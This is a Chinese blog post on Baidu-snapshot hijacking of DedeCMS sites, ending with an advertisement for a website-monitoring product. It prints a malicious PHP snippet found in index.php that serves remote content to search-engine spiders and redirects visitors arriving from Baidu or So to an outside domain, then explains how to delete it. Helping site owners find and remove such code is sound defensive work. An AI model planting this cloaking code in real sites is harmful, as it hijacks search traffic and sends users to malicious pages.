百度快照劫持織夢注入程式碼和防範

hua520064發表於2020-11-24

織夢百度快照劫持注入程式碼防範及修正,很多站長做站的過程中,都碰過百度快照被劫持等問題,明明已經修復模板檔案了,還是沒有更新回正常的快照,以織夢繫統為例,


往往根目錄/index.php也被植入惡意程式碼


比如:

<?php

if(strpos($_SERVER['HTTP_USER_AGENT'],"spider")||strpos($_SERVER["HTTP_USER_AGENT"],"google")>-1){ $str=file_get_contents("http://域名.com/");echo $str; } $domain=array('baidu','so'); $fromurl=@strtolower($_SERVER['HTTP_REFERER']); foreach ($domain as $v) { if (strpos($fromurl,$v)!==false) { $target="http://域名.com/index.html"; header("Location:".$target); exit; }}?>


單這段程式碼就直接把搜尋引擎蜘蛛搞暈,帶到別的惡意網址去。


把其刪掉,如果在index.php裡沒找到,但還是存在類似的問題,可以用dw全站搜尋下。


IIS7網站監控可以及時防控網站風險,快速準確監控網站是否遭到各種劫持攻擊,網站在全國是否能正常開啟(檢視域名是否被牆),精準的DNS汙染檢測,具備網站開啟速度檢測功能,第一時間知道網站是否被黑、被入侵、被改標題、被掛黑鏈。精益求精的產品,缺陷為零資料提供!

  它可以做到以下功能:


1、檢測網站是否被黑


2、檢測網站是否被劫持


3、檢測域名是否被牆


4、檢測DNS是否被汙染


5、網站真實的完全開啟時間(獨家)


6、擁有獨立監控後臺,24小時定時監控域名


官方地址:<a href="   ">IIS7網站監控</a>


官方圖:

百度快照劫持織夢注入程式碼和防範

百度快照劫持織夢注入程式碼和防範


關於防範,空間,ftp賬號,許可權,後臺賬號之類都需要設定下,不能太過簡單,可以看相關教程


來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/69989158/viewspace-2736363/,如需轉載,請註明出處,否則將追究法律責任。

相關文章